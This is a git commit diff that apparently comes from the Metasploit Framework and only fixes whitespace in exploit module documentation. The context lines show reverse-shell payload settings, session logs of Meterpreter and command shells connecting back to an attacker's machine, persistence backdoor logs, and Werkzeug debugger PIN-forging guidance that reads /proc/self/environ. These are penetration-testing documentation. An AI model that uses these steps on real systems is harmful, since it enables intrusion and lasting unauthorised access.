add space fixes, try 1

h00die · h00die · commit e7043bdf9a2f · 2025-10-16T19:06:35.000-04:00
diff --git a/documentation/modules/exploit/linux/http/axis_srv_parhand_rce.md b/documentation/modules/exploit/linux/http/axis_srv_parhand_rce.md
@@ -23,4 +23,4 @@ https://www.axis.com/files/sales/ACV-128401_Affected_Product_List.pdf
 5. Do: `set payload [name of payload]`
 6. Set LHOST if you are using a reverse shell
 7. Do: `run`
-8. You should get a session
+8. You should get a session
diff --git a/documentation/modules/exploit/linux/http/craftcms_preauth_rce_cve_2025_32432.md b/documentation/modules/exploit/linux/http/craftcms_preauth_rce_cve_2025_32432.md
@@ -76,7 +76,7 @@ ddev launch
 The module has the following option:
 
 - **ASSET_ID**: This option is required for older versions of Craft CMS, particularly in the 3.x series.
-    It specifies the asset ID for the Craft CMS instance. For 3.x versions, this ID must be set correctly to exploit the vulnerability.
+It specifies the asset ID for the Craft CMS instance. For 3.x versions, this ID must be set correctly to exploit the vulnerability.
 
 For example, if you are targeting a Craft CMS version from the `>= 3.0.0`, `< 3.9.14`, make sure to specify the correct `ASSET_ID`.
 This is necessary for successful exploitation when dealing with these versions.
diff --git a/documentation/modules/exploit/linux/http/denyall_waf_exec.md b/documentation/modules/exploit/linux/http/denyall_waf_exec.md
@@ -44,4 +44,4 @@ msf exploit(denyall_exec) > exploit
 meterpreter > pwd
 /var/log/denyall/reverseproxy
 meterpreter >
-```
+```
diff --git a/documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md b/documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md
@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-  Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso)
+Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso)
 
 This module has been verified against:
 
@@ -9,40 +9,40 @@ This module has been verified against:
 
 ## Verification Steps
 
-  1. Install the firewall
-  2. Start msfconsole
-  3. Do: ```use exploit/linux/http/ipfire_oinkcode_exec```
-  4. Do: ```set password admin``` or whatever it was set to at install
-  5. Do: ```set rhost 10.10.10.10```
-  6. Do: ```set payload cmd/unix/reverse_perl```
-  7. Do: ```set lhost 192.168.2.229```
-  8. Do: ```exploit```
-  9. You should get a shell.
+1. Install the firewall
+2. Start msfconsole
+3. Do: ```use exploit/linux/http/ipfire_oinkcode_exec```
+4. Do: ```set password admin``` or whatever it was set to at install
+5. Do: ```set rhost 10.10.10.10```
+6. Do: ```set payload cmd/unix/reverse_perl```
+7. Do: ```set lhost 192.168.2.229```
+8. Do: ```exploit```
+9. You should get a shell.
 
 ## Options
 
 ### PASSWORD
 
-  Password is set at install.  May be blank, 'admin', or 'ipfire'.
+Password is set at install.  May be blank, 'admin', or 'ipfire'.
 
 ## Scenarios
 
-  ```
-    msf > use exploit/linux/http/ipfire_oinkcode_exec 
-    msf exploit(ipfire_oinkcode_exec) > set password admin
-    password => admin
-    msf exploit(ipfire_oinkcode_exec) > set rhost 192.168.2.201
-    rhost => 192.168.2.201
-    msf exploit(ipfire_oinkcode_exec) > set verbose true
-    verbose => true
-    msf exploit(ipfire_oinkcode_exec) > check
-    [*] 192.168.2.201:444 The target appears to be vulnerable.
-    msf exploit(ipfire_oinkcode_exec) > exploit
-    
-    [*] Started reverse TCP handler on 192.168.2.117:4444 
-    [*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.201:38412) at 2017-06-14 21:12:21 -0400
-    id
-    uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
-    whoami
-    nobody
-  ```
+```
+msf > use exploit/linux/http/ipfire_oinkcode_exec 
+msf exploit(ipfire_oinkcode_exec) > set password admin
+password => admin
+msf exploit(ipfire_oinkcode_exec) > set rhost 192.168.2.201
+rhost => 192.168.2.201
+msf exploit(ipfire_oinkcode_exec) > set verbose true
+verbose => true
+msf exploit(ipfire_oinkcode_exec) > check
+[*] 192.168.2.201:444 The target appears to be vulnerable.
+msf exploit(ipfire_oinkcode_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.2.117:4444 
+[*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.201:38412) at 2017-06-14 21:12:21 -0400
+id
+uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
+whoami
+nobody
+```
diff --git a/documentation/modules/exploit/linux/http/motioneye_auth_rce_cve_2025_60787.md b/documentation/modules/exploit/linux/http/motioneye_auth_rce_cve_2025_60787.md
@@ -109,4 +109,4 @@ A script for manually signing requests is available in data/exploits/CVE-2025-60
 Example of usage:
 ```
 python3 ./sign_request.py --method "GET" --path "/config/1/get/?force=true&_=1759747431350&_username=admin" --body "" --key ""
-```
+```
diff --git a/documentation/modules/exploit/linux/http/samsung_srv_1670d_upload_exec.md b/documentation/modules/exploit/linux/http/samsung_srv_1670d_upload_exec.md
@@ -91,4 +91,4 @@ msf exploit(samsung_srv_1670d_upload_exec) > [*] Obtaining credentails...
 [*] Executing payload...
 [*] Sending stage (33986 bytes) to 192.168.1.200
 [*] Meterpreter session 3 opened (192.168.1.122:4358 -> 192.168.1.200:55676) at 2017-06-19 11:52:22 +0100
-```
+```
diff --git a/documentation/modules/exploit/linux/http/trend_micro_imsva_exec.md b/documentation/modules/exploit/linux/http/trend_micro_imsva_exec.md
@@ -68,4 +68,4 @@ msf exploit(trend_micro_imsva_exec) > exploit
 [*] Attempting to login with notvalid:notvalid123
 [-] Exploit aborted due to failure: no-access: 12.0.0.140:8445 - Login with notvalid:notvalid123 failed...
 [*] Exploit completed, but no session was created.
-```
+```
diff --git a/documentation/modules/exploit/linux/http/trendmicro_imsva_widget_exec.md b/documentation/modules/exploit/linux/http/trendmicro_imsva_widget_exec.md
@@ -58,4 +58,4 @@ msf exploit(trendmicro_imsva_widget_exec) > exploit
 pwd
 /opt/trend/imss/UI/adminUI/ROOT/widget
 
-```
+```
diff --git a/documentation/modules/exploit/linux/http/xplico_exec.md b/documentation/modules/exploit/linux/http/xplico_exec.md
@@ -85,4 +85,4 @@ msf exploit(securityonion_xplico_exec) > exploit
 
 id
 uid=0(root) gid=0(root) groups=0(root)
-```
+```
diff --git a/documentation/modules/exploit/linux/local/cve_2021_3493_overlayfs.md b/documentation/modules/exploit/linux/local/cve_2021_3493_overlayfs.md
@@ -91,9 +91,9 @@ The binaries used by this exploit `data/exploits/CVE-2021-3493/cve_2021_3493.x64
 `data/exploits/CVE-2021-3493/cve_2021_3493.x64.elf` can and be used separately from
 metasploit.  The parameters required are:
 ```
-    // argv[1] = The payload or executable you wish to launch
-    // argv[2] = A directory to store the files and directories created when the exploit runs
-    // argv[3] = A random string that is used to create directory names.
+// argv[1] = The payload or executable you wish to launch
+// argv[2] = A directory to store the files and directories created when the exploit runs
+// argv[3] = A random string that is used to create directory names.
 ```
 ```
 msfuser@ubuntu-18041:~$ id
diff --git a/documentation/modules/exploit/linux/misc/netcore_udp_53413_backdoor.md b/documentation/modules/exploit/linux/misc/netcore_udp_53413_backdoor.md
@@ -91,4 +91,4 @@ msf exploit(netcore_udp_53413_backdoor) > check
 [+] Backdoor Unlocked
 [*] Router backdoor triggered, but non-exploitable echo command detected.  Not currently exploitable with Metasploit.
 [*] The target service is running, but could not be validated.
-```
+```
diff --git a/documentation/modules/exploit/linux/persistence/apt_package_manager.md b/documentation/modules/exploit/linux/persistence/apt_package_manager.md
@@ -135,4 +135,4 @@ Meterpreter  : x64/linux
 [*] Processing /root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc for ERB directives.
 resource (/root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc)> rm /etc/apt/apt.conf.d/76skoGqswo
 resource (/root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc)> rm /tmp/erNOJV96u
-```
+```
diff --git a/documentation/modules/exploit/linux/persistence/autostart.md b/documentation/modules/exploit/linux/persistence/autostart.md
@@ -115,4 +115,4 @@ Login via gui
 [*] Sending stage (3045380 bytes) to 222.222.2.222
 [*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:44316) at 2025-02-06 17:03:50 -0500
 [msf](Jobs:2 Agents:2) exploit(linux/persistence/autostart) > 
-```
+```
diff --git a/documentation/modules/exploit/linux/persistence/bash_profile.md b/documentation/modules/exploit/linux/persistence/bash_profile.md
@@ -108,4 +108,4 @@ Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
 (Meterpreter 2)(/tmp) > 
-```
+```
diff --git a/documentation/modules/exploit/linux/persistence/docker_image.md b/documentation/modules/exploit/linux/persistence/docker_image.md
@@ -165,4 +165,4 @@ Channel 3 created.
 touch /host/root/pwnd
 ls -lah /host/root/pwnd
 -rw-r--r--    1 root     root           0 Sep 10 17:02 /host/root/pwnd
-```
+```
diff --git a/documentation/modules/exploit/linux/persistence/init_openrc.md b/documentation/modules/exploit/linux/persistence/init_openrc.md
@@ -114,4 +114,4 @@ payload => cmd/unix/reverse_openssl
 [*] Matching...
 [*] A is input...
 [*] Command shell session 2 opened (111.111.1.111:4444 -> 222.222.2.222:43560) at 2025-02-09 09:32:07 -0500
-```
+```
diff --git a/documentation/modules/exploit/linux/persistence/init_systemd.md b/documentation/modules/exploit/linux/persistence/init_systemd.md
@@ -205,4 +205,4 @@ session => 1
 [*] Sending stage (3045380 bytes) to 222.222.2.222
 [*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/ubuntu18desktop.local_20250212.5514/ubuntu18desktop.local_20250212.5514.rc
 [*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:58406) at 2025-02-12 16:55:15 -0500
-```
+```
diff --git a/documentation/modules/exploit/linux/persistence/init_systemd_override.md b/documentation/modules/exploit/linux/persistence/init_systemd_override.md
@@ -157,4 +157,4 @@ resource (/root/.msf4/logs/persistence/2.2.2.2_20250911.1859/2.2.2.2_20250911.18
 Process 2914 created.
 resource (/root/.msf4/logs/persistence/2.2.2.2_20250911.1859/2.2.2.2_20250911.1859.rc)> execute -f /bin/systemctl -a "restart ssh.service"
 Process 2915 created.
-```
+```
diff --git a/documentation/modules/exploit/linux/persistence/motd.md b/documentation/modules/exploit/linux/persistence/motd.md
@@ -123,4 +123,4 @@ msf6 exploit(linux/local/motd_persistence) > sessions -i -1
 meterpreter > getuid
 Server username: root
 meterpreter > 
-```
+```
diff --git a/documentation/modules/exploit/linux/persistence/rc_local.md b/documentation/modules/exploit/linux/persistence/rc_local.md
@@ -121,4 +121,4 @@ Terminate channel 4? [y/N]  y
 (Meterpreter 2)(/) > getuid
 Server username: root
 (Meterpreter 2)(/) > 
-```
+```
diff --git a/documentation/modules/exploit/linux/persistence/yum_package_manager.md b/documentation/modules/exploit/linux/persistence/yum_package_manager.md
@@ -109,4 +109,4 @@ session => 1
 [*] Backdoor uploaded to /tmp/7EtplboZD
 [+] Backdoor will run on next Yum update
 [*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/centos71.localdomain_20250216.3101/centos71.localdomain_20250216.3101.rc
-```
+```
diff --git a/documentation/modules/exploit/linux/ssh/exagrid_known_privkey.md b/documentation/modules/exploit/linux/ssh/exagrid_known_privkey.md
@@ -24,4 +24,4 @@ msf exploit(exagrid_known_privkey) > run
 
 ExaGrid diagnostic tools are available in this shell.
 02:05:49 up 12 days, 9:12, 0 users, load average: 3.32, 2.88, 9.21
-```
+```
diff --git a/documentation/modules/exploit/multi/http/drupal_drupageddon.md b/documentation/modules/exploit/multi/http/drupal_drupageddon.md
@@ -54,4 +54,4 @@ Meterpreter : php/linux
 
 meterpreter > getuid
 Server username: apache (48)
-  ```
+  ```
diff --git a/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md b/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md
@@ -411,4 +411,4 @@ BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
 meterpreter >
 
-```
+```
diff --git a/documentation/modules/exploit/multi/http/werkzeug_debug_rce.md b/documentation/modules/exploit/multi/http/werkzeug_debug_rce.md
@@ -441,49 +441,49 @@ Method of authentication. Valid values are:
   application's environment. **When this mode is used, the following additional
   options must be set:**
   - `APPNAME`: The name of the application according to Werkzeug. This is often
-    `Flask`, `DebuggedApplication` or `wsgi_app`. Used along with other
-    information to generate a PIN and cookie.
+`Flask`, `DebuggedApplication` or `wsgi_app`. Used along with other
+information to generate a PIN and cookie.
   - `CGROUP`: Control group. This may be an empty string (''), for example if
-    the OS running the app is Linux and supports cgroup v2, or the OS is not
-    Linux. If you have path traversal on Linux, this could be read from
-    `/proc/self/cgroup`
+the OS running the app is Linux and supports cgroup v2, or the OS is not
+Linux. If you have path traversal on Linux, this could be read from
+`/proc/self/cgroup`
   - `FLASKPATH`: Path to (and including) `site-packages/flask/app.py`. *If you
-    have triggered the debugger via an exception, it will be at the top of the
-    stack trace. E.g. `/usr/local/lib/python3.12/site-packages/flask/app.py`*.
+have triggered the debugger via an exception, it will be at the top of the
+stack trace. E.g. `/usr/local/lib/python3.12/site-packages/flask/app.py`*.
     **Note that the file extension may need to be changed to .pyc**
   - `MACADDRESS`: The MAC address of the system that the application is running
-    on. *If you have path traversal on Linux, this could be read from
-    `/sys/class/net/eth0/`*
+on. *If you have path traversal on Linux, this could be read from
+`/sys/class/net/eth0/`*
   - `MACHINEID`:
-    - On Linux: *If you have path traversal on Linux, this could be read from
-      /etc/machine-id, or if that doesn't exist,
-      /proc/sys/kernel/random/boot_id.*
-    - On Windows: This is a UUID stored in the registry at
-      `HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid`.
-    - On macOS,: This is the UTF-8 encoded serial number of the system
-      (lower-case hexadecimal), padded to 32 characters. E.g. `N0TAREALSERIAL`
-      becomes
-      `4e3054415245414c53455249414c000000000000000000000000000000000000`. This
-      can be retrieved with the following command
-      `ioreg -c IOPlatformExpertDevice | grep \"serial-number\"`
+- On Linux: *If you have path traversal on Linux, this could be read from
+  /etc/machine-id, or if that doesn't exist,
+  /proc/sys/kernel/random/boot_id.*
+- On Windows: This is a UUID stored in the registry at
+  `HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid`.
+- On macOS,: This is the UTF-8 encoded serial number of the system
+  (lower-case hexadecimal), padded to 32 characters. E.g. `N0TAREALSERIAL`
+  becomes
+  `4e3054415245414c53455249414c000000000000000000000000000000000000`. This
+  can be retrieved with the following command
+  `ioreg -c IOPlatformExpertDevice | grep \"serial-number\"`
   - `MODULENAME`: Name of the application module. Often `flask.app` or
-    `werkzeug.debug`
+`werkzeug.debug`
   - `SERVICEUSER`: User account name that the service is running under.
-    [This may be an empty string ('') in some cases](https://github.com/pallets/werkzeug/blob/main/src/werkzeug/debug/__init__.py#L172)
-    . *If you have path traversal on Linux, you may be able to read this from
-    `/proc/self/environ`*
+[This may be an empty string ('') in some cases](https://github.com/pallets/werkzeug/blob/main/src/werkzeug/debug/__init__.py#L172)
+. *If you have path traversal on Linux, you may be able to read this from
+`/proc/self/environ`*
 - `known-cookie`: Cookie provided by user. **When this mode is used, the
   following additional option must be set:**
   - `COOKIE`: The HTTP cookie to use for authentication to the debugger.
 - `known-PIN`: **Does not bypass PIN-locked applications.** PIN provided by
   user. **When this mode is used, the following additional option must be set:**
   - `PIN`: Known 6 digit PIN to use for authentication. This can be set to a
-    custom value by the application developer, in which case generating the pin
-    won't work. *However, if you have path traversal, you may be able to
-    retrieve the PIN by reading the application source code, or on Linux by
-    reading `/proc/self/environ` to obtain the value. of the
-    `WERKZEUG_DEBUG_PIN` environment variable. It may also be possible to obtain
-    the PIN by accessing the logging that Werkzeug prints to stdout*.
+custom value by the application developer, in which case generating the pin
+won't work. *However, if you have path traversal, you may be able to
+retrieve the PIN by reading the application source code, or on Linux by
+reading `/proc/self/environ` to obtain the value. of the
+`WERKZEUG_DEBUG_PIN` environment variable. It may also be possible to obtain
+the PIN by accessing the logging that Werkzeug prints to stdout*.
 - `none`: For applications that don't require authentication. I.e. Werkzeug
   version 0.10 or lower or PIN authentication has been disabled by the
   application developer.
@@ -500,7 +500,7 @@ following additional option may be set:**
   the debugger. E.g. invalid form value to raise an exception. **When this is
   set the following additional option may be set:**
   - `REQUESTCONTENTTYPE`: Request body encoding. Default:
-    `application/x-www-form-urlencoded`
+`application/x-www-form-urlencoded`
 
 ### `TARGETURI`
 
diff --git a/documentation/modules/exploit/multi/http/xwiki_unauth_rce_cve_2025_24893.md b/documentation/modules/exploit/multi/http/xwiki_unauth_rce_cve_2025_24893.md
@@ -116,4 +116,4 @@ Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
 meterpreter > 
-```
+```
diff --git a/documentation/modules/exploit/multi/persistence/at.md b/documentation/modules/exploit/multi/persistence/at.md
@@ -187,4 +187,4 @@ payload => osx/x64/meterpreter_reverse_tcp
 [*] Waiting up to sec for execution
 [*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/20.20.20.21_20250221.0028/20.20.20.21_20250221.0028.rc
 [*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.22.2.2:49165) at 2025-02-21 17:02:29 -0500
-```
+```
diff --git a/documentation/modules/exploit/multi/persistence/cron.md b/documentation/modules/exploit/multi/persistence/cron.md
@@ -210,4 +210,4 @@ session => 1
 [*] Sending stage (3045380 bytes) to 222.222.2.22
 [*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.22:43108) at 2025-02-17 17:38:02 -0500
 [msf](Jobs:2 Agents:2) exploit(multi/persistence/cron) >
-```
+```
diff --git a/documentation/modules/exploit/multi/persistence/obsidian_plugin.md b/documentation/modules/exploit/multi/persistence/obsidian_plugin.md
@@ -123,4 +123,4 @@ payload => cmd/windows/http/x64/meterpreter/reverse_tcp
 [*] Sending payload to 222.222.2.22 (CertUtil URL Agent)
 [*] Sending stage (203846 bytes) to 222.222.2.22
 [*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.22:50145) at 2025-02-17 09:11:41 -0500
-```
+```
diff --git a/documentation/modules/exploit/osx/persistence/launch_plist.md b/documentation/modules/exploit/osx/persistence/launch_plist.md
@@ -111,4 +111,4 @@ Process 2138 created.
 Channel 8 created.
 launchctl load -w /Users/macos/Library/LaunchAgents/com.system.update.plist
 [*] Meterpreter session 5 opened (111.111.1.111:4444 -> 222.22.2.2:49157) at 2025-02-19 19:11:23 -0500
-```
+```
diff --git a/documentation/modules/exploit/unix/http/freepbx_unauth_sqli_to_rce.md b/documentation/modules/exploit/unix/http/freepbx_unauth_sqli_to_rce.md
@@ -112,4 +112,4 @@ OS           : Red Hat 7.8.2003 (Linux 3.10.0-1127.19.1.el7.x86_64)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
-```
+```
diff --git a/documentation/modules/exploit/windows/fileformat/winrar_cve_2023_38831.md b/documentation/modules/exploit/windows/fileformat/winrar_cve_2023_38831.md
@@ -36,4 +36,4 @@ The filename for the crafted RAR file that will be generated.
 
 [CVE-2023-38831](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-38831)
 [Group-IB Research](https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/)
-[Analysis](https://b1tg.github.io/post/cve-2023-38831-winrar-analysis/)
+[Analysis](https://b1tg.github.io/post/cve-2023-38831-winrar-analysis/)
diff --git a/documentation/modules/exploit/windows/http/manageengine_adshacluster_rce.md b/documentation/modules/exploit/windows/http/manageengine_adshacluster_rce.md
@@ -51,4 +51,4 @@ System Language : pl_PL
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/windows
-```
+```
diff --git a/documentation/modules/exploit/windows/http/smartermail_rce.md b/documentation/modules/exploit/windows/http/smartermail_rce.md
diff --git a/documentation/modules/exploit/windows/http/syncbreeze_bof.md b/documentation/modules/exploit/windows/http/syncbreeze_bof.md
diff --git a/documentation/modules/exploit/windows/persistence/image_exec_options.md b/documentation/modules/exploit/windows/persistence/image_exec_options.md

-Original file line number
+Diff line change
 pwd
 /opt/trend/imss/UI/adminUI/ROOT/widget
 -```
 +```